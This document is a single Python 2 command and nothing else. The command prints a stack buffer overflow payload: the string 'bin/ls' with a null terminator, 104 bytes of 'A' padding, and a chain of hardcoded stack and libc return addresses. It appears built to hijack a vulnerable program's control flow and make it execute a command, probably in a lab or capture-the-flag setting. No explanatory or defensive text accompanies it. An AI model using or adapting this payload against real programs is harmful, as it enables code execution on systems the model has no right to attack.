python2 -c 'print "bin/ls\x00" +\
            "\x60\xd9\xff\xff\xff\x7f\x00\x00" +\
            "\x00" * 8 +\
            "A" * 104 +\
            "\x10\xda\xff\xff\xff\x7f\x00\x00" +\
            "\x35\x68\xdd\xf7\xff\x7f\x00\x00" +\
            "\x60\xd9\xff\xff\xff\x7f\x00\x00" +\
            "\x51\x81\xdd\xf7\xff\x7f\x00\x00" +\
            "\x68\xd9\xff\xff\xff\x7f\x00\x00" +\
            "\x49\x58\xe3\xf7\xff\x7f\x00\x00" +\
            "\00" * 4 +\
            "\x50\x5f\xe8\xf7\xff\x7f\x00\x00"
            '
